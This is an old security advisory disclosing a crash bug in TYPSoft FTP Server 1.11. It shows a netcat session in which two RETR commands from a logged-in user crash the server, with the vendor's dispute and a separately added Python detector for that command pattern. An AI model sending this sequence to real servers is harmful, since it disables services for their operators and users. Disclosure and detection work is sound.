Message-ID: <BAY19-DAV45B8B356CBC19A1404A60D97A0@phx.gbl>
Date: Thu Oct 13 21:15:35 2005
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: TYPSoft ftpd
EXPL-A-2005-016 exploitlabs.com Advisory 045
AFFECTED PRODUCTS
TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/
OVERVIEW
TYPSoft FTP Server is a fast and easy ftp server
with support to Standard FTP Command,
Clean interface, Virtual File System architecture,
ability to resume Download and Upload, IP Restriction,
Login/Quit message, logs, Multi Language
and many other things.
DETAILS
1. DOS
TYPSoft FTP Server does not properly handle the
RETR command when "Sub Directory Include" is checked
in the user config. This is exploitable by users
authenticated to TYPSoft ftpd.
POC
1. by requesting 2 RETR [string] commands in succession
C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>
Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"
note: string length has no effect and
does not appear exploitable.
SOLUTION:
vendor contact:
Oct 10, 2005 webmaster@...soft.com
response:
---------
Well, I don't see any security problem except that TFS will raise an error
because the socket was not open on the second RETR.
It's more a bug than a security problem, except if you show me the opposite.
Marc
TYPSoft
reply:
------
see attached Perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip
it demonstrates a full crash ( program exit ) from remote.
note: a remote DOS[crash] is classified as a security issue, even if it does not
lead to compromise, due to the fact that a remote user ( not administrative )
can disable[crash] a (needed) service.
response:
---------
[none]
CREDITS
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
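
Added example (not part of the original advisory or the vendor's code): a detection heuristic that flags the command sequence shown in the POC session, RETR issued repeatedly with no PORT/PASV data-channel setup in between. It assumes a control-channel transcript with one client command or server reply per line; the function names and the benign session are constructed for illustration.

```python
import re

# Heuristic for the pattern in this advisory: RETR sent with no data-channel
# setup (PORT/PASV/EPRT/EPSV) since login or since the previous transfer.
# RFC 959 allows a default data port, so one such RETR is unusual, not invalid;
# a repeated run is the sequence shown in the advisory's session.
SETUP = {"PORT", "PASV", "EPRT", "EPSV"}
TRANSFER = {"RETR", "STOR", "STOU", "APPE", "LIST", "NLST"}
# Client commands are 3-4 letters plus an optional argument; server replies
# start with a 3-digit code and therefore never match.
CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?:\s+.*)?$")

def find_unprepared_retr(lines):
    """Return [(line_no, command, run_length)] for each unprepared RETR."""
    findings, channel_ready, run = [], False, 0
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        m = CMD_RE.match(line)
        if not m:
            continue
        verb = m.group(1).upper()
        if verb in SETUP:
            channel_ready, run = True, 0
        elif verb in TRANSFER:
            if verb == "RETR" and not channel_ready:
                run += 1
                findings.append((no, line, run))
            else:
                run = 0
            channel_ready = False  # a transfer consumes the prepared channel
    return findings

def repeated_unprepared_retr(lines):
    """True when two or more unprepared RETRs occur back to back."""
    return any(run >= 2 for _, _, run in find_unprepared_retr(lines))

# Control-channel lines taken from the session in the advisory above.
PAGE_SESSION = ["220 TYPSoft FTP Server 1.11 ready...", "USER ok",
                "331 Password required for ok.", "PASS ok",
                "230 User ok logged in.", "RETR 0",
                "150 Opening data connection for 0.", "RETR 0",
                "150 Opening data connection for 0."]
# Constructed sample: a normal passive-mode download of two files.
BENIGN_SESSION = ["USER ok", "PASS ok", "PASV",
                  "227 Entering Passive Mode (192,168,0,2,4,1).", "RETR a.txt",
                  "226 Transfer complete.", "PASV",
                  "227 Entering Passive Mode (192,168,0,2,4,2).", "RETR b.txt"]

if __name__ == "__main__":
    for name, s in (("advisory", PAGE_SESSION), ("benign", BENIGN_SESSION)):
        print(name, repeated_unprepared_retr(s), find_unprepared_retr(s))
```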